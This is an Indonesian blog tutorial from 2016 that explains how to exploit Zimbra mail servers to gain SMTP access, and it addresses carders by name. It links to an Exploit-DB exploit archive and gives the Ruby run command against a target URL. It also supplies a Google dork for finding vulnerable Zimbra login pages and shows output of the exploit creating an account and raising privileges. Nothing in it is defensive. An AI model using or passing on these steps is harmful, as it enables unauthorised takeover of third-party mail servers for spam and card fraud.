Minggu, 30 Oktober 2016

Cara Exploit Zimbra ( Untuk mencari SMTP )

Tutorial Exploit Zimbra ( Untuk mencari SMTP )

  Ketemu lagi ama Ane Anak Tatad  Karena seiringnya perubahan Zaman ane jadi ganti Profesi 
Yang dulu Gamers (doyan ngecheat, cheatnya ngemis pula  ) skrg jadi ***** Terserah ente mau nyebut apa 
Yukk langsung aja To The Point

Di sini ane mau ngasih tutorial how to EXPLOIT Zimbra atau Untuk mencari SMTP(Send Mail To Protocol)
Untuk para Carder pasti ngerti lah apa fungsi dan kegunaan SMTP

Wajib DownloadAplikasi ruby
Exploitd-DB mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip


Langkah Installasi dan cara memperintahkan di cmd
  • Instal ruby samapai selesai di program files c:\
  • Download exploit db nya
  • Setalah di download jang lupa extrak file nya di program file ruby
  • ruby - bin; extrak di situ
  • Buka cmd
  • Jalan kan perintah nya  
  • "cd c:\ruby\bin" *tanpakutip
  • ruby run.rb -t http://www.target.com

Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork

inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri 


Langkah mencari target :

Jika sukses ada notice sepeti ini di cmd

[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
-

NB :

- Untuk nama folder "ruby" *tanpakutip (huruf kecil)
- Wajib install di Local disk C 

Tidak ada komentar:

Posting Komentar